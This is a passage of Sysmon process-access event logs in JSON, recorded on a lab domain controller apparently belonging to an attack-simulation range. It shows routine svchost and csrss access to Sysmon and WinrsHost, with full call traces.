C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.281","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032A-5F25-0000-0010C2BE0900}","TargetProcessId":"1328","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5037,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5038,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5039,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5040,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5041,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5042,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5043,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5044,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 